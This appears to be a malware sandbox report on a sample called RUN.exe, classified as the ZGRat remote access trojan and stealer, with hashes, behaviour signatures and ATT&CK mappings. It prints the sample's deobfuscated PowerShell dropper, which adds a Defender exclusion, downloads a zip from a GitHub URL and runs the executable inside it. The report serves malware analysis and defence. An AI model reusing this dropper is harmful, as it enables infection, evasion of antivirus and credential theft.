zgrat | f4f8f06d721e990735ac49cd219c8039b4f43d919305aee5282249e8d4db9063 | Triage

Submit
Reports

Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

Static

static

1

RUN.exe

windows10-2004-x64

Sharing

General

Target

RUN.exe
Size

25.5MB
Sample

240122-xrc4tsdaa4
MD5

f559e8fbcaf4bf3decd0e959883674b8
SHA1

a0bde63feed25ed365ba4bacccfc2e20fff3972d
SHA256

f4f8f06d721e990735ac49cd219c8039b4f43d919305aee5282249e8d4db9063
SHA512

4c65ed26ae899189ef65ac9d36757405e5cb9220e62bb4a4d3fca91e21b9ba9a2d7cd495fe2998d25488025bfeacc299a3bf5a323832f9e3cd3ab4ef74e97d7a
SSDEEP

393216:XOIAa2nR1/+ryDP5YKgoWWCdffSwObQFmSLeLVpevjpsJaxkFrphpLo6baYByTK4:oao/x5XWWKo7SLe7e9iBrhdNmYByTLP

Score

10^/10

zgrat collection discovery evasion persistence rat spyware stealer trojan

Static task

static1

Behavioral task

behavioral1

Sample

RUN.exe

Resource

win10v2004-20231215-es

zgrat collection discovery evasion persistence rat spyware stealer trojan

windows10-2004-x64

40 signatures

300 seconds

Malware Config

Extracted

Language

ps1

Deobfuscated

1

"Continue" = "SilentlyContinue"

2

timeout / nobreak / t 5

3

$file = "$env:localappdata\\Microwave\\Vault\\TelemetryHandlers\\winupdates\\SurrogateServerIntoSvc.exe"

4

if (test-path -path $file) {

5

exit

6

}

7

$vrer2 = "$env:userprofile"

8

add-mppreference -exclusionpath "$vrer2" -force

9

new-item -path "$env:localappdata\\Microwave\\Vault\\TelemetryHandlers\\winupdates" -itemtype directory

10

# Block for declaring the script parameters.

11

# Block for declaring the script parameters.

12

# Block for declaring the script parameters.

13

# Block for declaring the script parameters.

14

$webfile = "https://raw.githubusercontent.com/washywashy14/7zip-bin/master/win/Uemlxaw.zip"

15

# Block for declaring the script parameters.

16

# Block for declaring the script parameters.

17

# Block for declaring the script parameters.

18

# Block for declaring the script parameters.

19

$outff = "$env:localappdata\\Microwave\\Vault\\TelemetryHandlers\\winupdates\\Uemlxaw.zip"

20

invoke-webrequest -uri $webfile -outfile $outff

21

timeout / nobreak / t 5

22

add-type -assemblyname system.io.compression.filesystem

23

function unzip {

24

param([string]$zipfile, [string]$outpath)

25

[system.io.compression.zipfile]::extracttodirectory($zipfile, $outpath)

26

}

27

unzip "$env:localappdata\\Microwave\\Vault\\TelemetryHandlers\\winupdates\\Uemlxaw.zip" "$env:localappdata\\Microwave\\Vault\\TelemetryHandlers\\winupdates"

28

timeout / nobreak / t 10

29

start-process -filepath "$env:localappdata\\Microwave\\Vault\\TelemetryHandlers\\winupdates\\SurrogateServerIntoSvc.exe"

30

exit

31

URLs

exe.dropper

https://raw.githubusercontent.com/washywashy14/7zip-bin/master/win/Uemlxaw.zip

Targets

- Target
  
  RUN.exe
- Size
  
  25.5MB
- MD5
  
  f559e8fbcaf4bf3decd0e959883674b8
- SHA1
  
  a0bde63feed25ed365ba4bacccfc2e20fff3972d
- SHA256
  
  f4f8f06d721e990735ac49cd219c8039b4f43d919305aee5282249e8d4db9063
- SHA512
  
  4c65ed26ae899189ef65ac9d36757405e5cb9220e62bb4a4d3fca91e21b9ba9a2d7cd495fe2998d25488025bfeacc299a3bf5a323832f9e3cd3ab4ef74e97d7a
- SSDEEP
  
  393216:XOIAa2nR1/+ryDP5YKgoWWCdffSwObQFmSLeLVpevjpsJaxkFrphpLo6baYByTK4:oao/x5XWWKo7SLe7e9iBrhdNmYByTLP
Score

10^/10

zgrat collection discovery evasion persistence rat spyware stealer trojan
- Detect ZGRat V1
- Modifies Windows Defender Real-time Protection settings
  evasion trojan
- Modifies security service
  evasion
- Suspicious use of NtCreateUserProcessOtherParentProcess
- ZGRat
  ZGRat is remote access trojan written in C#.
  rat zgrat
- Downloads MZ/PE file
- Drops file in Drivers directory
- Stops running service(s)
  evasion
- Checks computer location settings
  Looks up country code configured in the registry, likely geofence.
- Executes dropped EXE
- Loads dropped DLL
- Reads user/profile data of local email clients
  Email clients store some user data on disk where infostealers will often target it.
  spyware stealer
- Reads user/profile data of web browsers
  Infostealers often target stored browser data, which can include saved credentials etc.
  spyware stealer
- Accesses Microsoft Outlook profiles
  collection
- Adds Run key to start application
  persistence
- Blocklisted process makes network request
- Checks installed software on the system
  Looks up Uninstall key entries in the registry to enumerate software on the system.
  discovery
- Enumerates connected drives
  Attempts to read the root path of hard drives other than the default C: drive.
- Legitimate hosting services abused for malware hosting/C2
- Looks up external IP address via web service
  Uses a legitimate IP lookup service to find the infected system's external IP.
- Drops file in System32 directory
- Suspicious use of SetThreadContext
behavioral1

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Create or Modify System Process

Windows Service

Privilege Escalation

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Create or Modify System Process

Windows Service

Defense Evasion

Impair Defenses

Disable or Modify Tools

Modify Registry

Credential Access

Unsecured Credentials

Credentials In Files

Discovery

Peripheral Device Discovery

Query Registry

Remote System Discovery

System Information Discovery

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Web Service

Exfiltration

Impact

Service Stop

Tasks

static1

behavioral1

zgratcollectiondiscoveryevasionpersistenceratspywarestealertrojan

© 2018-2025

Terms | Privacy

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.